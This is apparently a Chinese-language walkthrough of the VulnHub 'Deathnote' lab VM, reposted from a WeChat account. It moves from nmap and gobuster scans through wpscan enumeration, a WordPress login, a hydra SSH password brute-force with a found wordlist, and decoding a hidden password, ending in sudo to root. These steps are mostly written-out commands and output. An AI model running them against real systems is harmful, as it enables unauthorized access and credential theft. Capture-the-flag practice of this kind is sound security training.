kali IP: 192.168.43.118
主机发现:sudo nmap -sP 192.168.43.1/24 or sudo nmap -sn 192.168.43.1/24
--> 目标IP:192.168.43.188
端口扫描:nmap -sC -sV -p- 192.168.43.188
--> 开放端口 22 80
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
| 256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_ 256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
浏览器访问http://192.168.43.188:80
--> 自动跳转到http://deathnote.vuln/wordpress,无法显示网页
在hosts中绑定ip: 192.168.43.188 deathnote.vuln
--> 网页显示正常,title显示kira
点击HINT 发现提示 -> Find a notes.txt file on server or SEE the L comment
--> L comment: my fav line is iamjustic3
目录扫描:
gobuster dir -u http://deathnote.vuln/ -w ../seclist/../direct-2.3-m.txt -x php,html.txt
--> robots.txt
fuck it my dad
added hint on /important.jpg
ryuk please delete it
有一个/important.jpg和一个账号ryuk
浏览器查看http://deathnote.vuln/important.jpg -> 无内容 -> wget下载
file important.jpg -> ASCII text
cat important.jpg ->
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira
i can only help you by giving something important
login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site
HINT 的时候获得的信息:L kira iamjustic3 notes.txt
important.jpg获取的信息:Soichiro Yagami user.txt
看到wordpress,可以用wpscan扫描以下
wpscan --url http://deathnote.vuln/wordpress -e u
--url 制定url地址
-e,--enumerate [opts] 枚举 u -> user IDs
--> 扫到一个账号kira
扫描wordpress下的目录:
gobuster dir -u http://deathnote.vuln/wordpress/ -w ../seclist/../direct-2.3-m.txt -x php,html.txt
--> /wp-login.php 发现了登录界面
使用之前获得的信息尝试登录 -> kira:iamjustic3登陆成功
在媒体库中发现了notes.txt,下载下来查看一下内容:
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
cat notes.txt
death4
death4life
death4u
death4ever
death4all
death420
death45
death4love
death49
death48
death456
death4014
1death4u
yaydeath44
thedeath4u2
thedeath4u
stickdeath420
reddeath44
megadeath44
megadeath4
killdeath405
hot2death4sho
death4south
death4now
death4l0ve
death4free
death4elmo
death4blood
death499Eyes301
death498
death4859
death47
death4545
death445
death444
death4387n
death4332387
death42521439
death42
death4138
death411
death405
death4me
是一个密码本。
将之前获得的信息编写一个user.txt:
user.txt:
l
kira
ryuk
soichiro
yagami
尝试爆破ssh :
hydra -L user.txt -P notes.txt ssh://192.168.43.188
--> l:death4me
目录下有一个 user.txt文件
--> cat user.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.
是brainfuck加密的,解密后 -->
i think u got the shell , but you wont be able to kill me -kira
找找其他文件,在opt文件夹下有一个L文件夹,查看里面的内容
--> fake-notebook-rule 和 kira-case文件夹
查看fake-notebook-rule文件下的内容:
--> case.wav 和 hint 文件
case.wav是一串十六进制:
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
hint -> use cyberchef
cyberchef是个加解密网站,用这个网站解密case.wav中的内容
-> from hex: cGFzc3dkIDoga2lyYWlzZXZpbCA=
-> from base64: passwd : kiraisevil
尝试用这个密码登录kira账户:
su kira
登陆成功
切换到/home/kira目录下,有一个kira.txt
cat kira.txt
--> cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp
sudo -l -> 查看kira的权限
--> (ALL:ALL) ALL 可以直接切换到root
sudo su
root获取成功
原文始发于微信公众号(北京路劲科技有限公司):靶场练习No.10 VulnHub靶场Deathnote
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论